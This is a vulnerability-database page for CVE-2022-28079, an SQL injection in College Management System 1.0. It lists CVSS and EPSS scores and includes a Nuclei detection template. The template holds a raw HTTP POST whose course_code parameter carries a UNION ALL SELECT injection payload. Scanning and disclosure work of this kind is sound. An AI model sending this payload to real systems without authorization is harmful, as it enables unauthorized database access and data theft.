Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2022-28079
HistoryJun 23, 2022 - 8:15 a.m.

College Management System 1.0 - SQL Injection

2022-06-2308:15:30
ProjectDiscovery
github.com
3

8.8 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

LOW

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

6.5 Medium

CVSS2

Access Vector

NETWORK

Access Complexity

LOW

Authentication

SINGLE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:S/C:P/I:P/A:P

0.692 Medium

EPSS

Percentile

98.0%

College Management System 1.0 contains a SQL injection vulnerability via the course code parameter.
id: CVE-2022-28079

info:
  name: College Management System 1.0 - SQL Injection
  author: ritikchaddha
  severity: high
  description: |
    College Management System 1.0 contains a SQL injection vulnerability via the course code parameter.
  impact: |
    Successful exploitation of this vulnerability can lead to unauthorized access, data leakage, and potential manipulation of the database.
  remediation: |
    Upgrade to the latest version to mitigate this vulnerability.
  reference:
    - https://github.com/erengozaydin/College-Management-System-course_code-SQL-Injection-Authenticated
    - https://download.code-projects.org/details/1c3b87e5-f6a6-46dd-9b5f-19c39667866f
    - https://nvd.nist.gov/vuln/detail/CVE-2022-28079
    - https://code-projects.org/college-management-system-in-php-with-source-code/
    - https://www.nu11secur1ty.com/2022/05/cve-2022-28079.html
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 8.8
    cve-id: CVE-2022-28079
    cwe-id: CWE-89
    epss-score: 0.80212
    epss-percentile: 0.98029
    cpe: cpe:2.3:a:college_management_system_project:college_management_system:1.0:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: college_management_system_project
    product: college_management_system
  tags: cve,cve2022,sqli,cms,collegemanagement,college_management_system_project
variables:
  num: "999999999"

http:
  - raw:
      - |
        POST /admin/asign-single-student-subjects.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        submit=Press&roll_no=3&course_code=sd' UNION ALL SELECT CONCAT(md5({{num}}),12,21),NULL,NULL,NULL,NULL#

    matchers-condition: and
    matchers:
      - type: word
        words:
          - '{{md5({{num}})}}'

      - type: status
        status:
          - 302
# digest: 4b0a00483046022100ad3280dd169fc265e15a1fb1734bb88fbfe21000ca36ebab37d25784e71c6416022100a02f6644e9b1a7fd03fc3523742435de169ba87b7c110db223a9010dad57fa2a:922c64590222798bb761d5b6d8e72950

8.8 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

LOW

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

6.5 Medium

CVSS2

Access Vector

NETWORK

Access Complexity

LOW

Authentication

SINGLE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:S/C:P/I:P/A:P

0.692 Medium

EPSS

Percentile

98.0%

Related for NUCLEI:CVE-2022-28079